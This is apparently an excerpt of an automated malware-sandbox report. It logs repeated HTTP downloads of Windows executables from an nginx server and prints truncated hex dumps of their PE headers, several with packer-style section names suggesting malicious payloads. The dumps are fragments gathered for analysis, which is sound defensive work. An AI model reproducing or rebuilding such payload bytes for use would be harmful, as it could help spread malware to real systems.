00 00 00 00 00 00 00 00 00 00 5f 10 72 00 73 00 00 00 00 00 72 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 56 c6 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 56 c6 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 71 00 00 10 00 00 00 a0 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 00 72 00 00 02 00 00 00 b0 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 72 00 00 02 00 00 00 b2 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 38 00 00 20 72 00 00 02 00 00 00 b4 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 73 6d 6f 71 63 6e 70 00 60 1b 00 00 00 ab 00 00 5a 1b 00 00 b6 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6b 74 64 6e 6e 64 61 00 10 00 00 00 60 c6 00 00 04 00 00 00 10 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 c6 00 00 22 00 00 00 14 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:17:02 GMTContent-Type: application/octet-streamContent-Length: 4433408Last-Modified: Sun, 22 Dec 2024 01:09:57 GMTConnection: keep-aliveETag: "676766e5-43a600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 07 98 63 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 4a 49 00 00 4c 75 00 00 32 00 00 00 d0 c5 00 00 10 00 00 00 60 49 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 c6 00 00 04 00 00 39 49 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f b0 72 00 73 00 00 00 00 a0 72 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc b2 c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c b2 c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 72 00 00 10 00 00 00 34 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 72 00 00 02 00 00 00 44 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 72 00 00 02 00 00 00 46 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 37 00 00 c0 72 00 00 02 00 00 00 48 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 61 73 66 68 6f 65 74 00 40 1b 00 00 80 aa 00 00 36 1b 00 00 4a 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 67 6a 74 65 79 75 72 00 10 00 00 00 c0 c5 00 00 04 00 00 00 80 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 c5 00 00 22 00 00 00 84 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:17:15 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:17:28 GMTContent-Type: application/octet-streamContent-Length: 1959936Last-Modified: Sun, 22 Dec 2024 00:12:20 GMTConnection: keep-aliveETag: "67675964-1de800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 97 69 b8 cb d3 08 d6 98 d3 08 d6 98 d3 08 d6 98 6e 47 40 98 d2 08 d6 98 cd 5a 52 98 ce 08 d6 98 cd 5a 43 98 c7 08 d6 98 cd 5a 55 98 b8 08 d6 98 f4 ce ad 98 d6 08 d6 98 d3 08 d7 98 a0 08 d6 98 cd 5a 5c 98 d2 08 d6 98 cd 5a 42 98 d2 08 d6 98 cd 5a 47 98 d2 08 d6 98 52 69 63 68 d3 08 d6 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a8 2c b1 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 da 02 00 00 40 01 00 00 00 00 00 00 30 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 86 00 00 04 00 00 c5 0a 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b 80 41 00 6f 00 00 00 00 d0 40 00 a0 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 b1 85 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 40 00 00 10 00 00 00 4e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a0 ae 00 00 00 d0 40 00 00 70 00 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 41 00 00 02 00 00 00 ce 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 29 00 00 90 41 00 00 02 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 73 64 73 64 73 72 62 00 f0 1a 00 00 30 6b 00 00 f0 1a 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 74 79 6c 7a 6f 6e 70 00 10 00 00 00 20 86 00 00 04 00 00 00 c2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 86 00 00 22 00 00 00 c6 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:17:36 GMTContent-Type: application/octet-streamContent-Length: 1845760Last-Modified: Sun, 22 Dec 2024 00:18:45 GMTConnection: keep-aliveETag: "67675ae5-1c2a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 10 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 49 00 00 04 00 00 f1 78 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 20 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 40 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 74 79 69 6d 6d 6f 6a 00 b0 19 00 00 50 2f 00 00 a6 19 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 6d 62 68 72 6b 6f 76 00 10 00 00 00 00 49 00 00 04 00 00 00 04 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 49 00 00 22 00 00 00 08 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:17:45 GMTContent-Type: application/octet-streamContent-Length: 2955776Last-Modified: Sun, 22 Dec 2024 00:18:56 GMTConnection: keep-aliveETag: "67675af0-2d1a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 50 50 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 50 00 00 04 00 00 0a 06 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 79 70 68 71 7a 6a 6c 00 80 2b 00 00 c0 24 00 00 76 2b 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 64 6d 73 7a 67 77 6e 00 10 00 00 00 40 50 00 00 06 00 00 00 f2 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 50 00 00 22 00 00 00 f8 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:17:56 GMTContent-Type: application/octet-streamContent-Length: 965120Last-Modified: Sun, 22 Dec 2024 00:16:25 GMTConnection: keep-aliveETag: "67675a59-eba00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 4a 5a 67 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 0a 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 0f 00 00 04 00 00 6c 44 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 b0 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 4e 01 00 00 40 0d 00 00 50 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 90 0e 00 00 76 00 00 00 44 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:18:04 GMTContent-Type: application/octet-streamContent-Length: 2809344Last-Modified: Sun, 22 Dec 2024 00:16:59 GMTConnection: keep-aliveETag: "67675a7b-2ade00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 d9 47 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 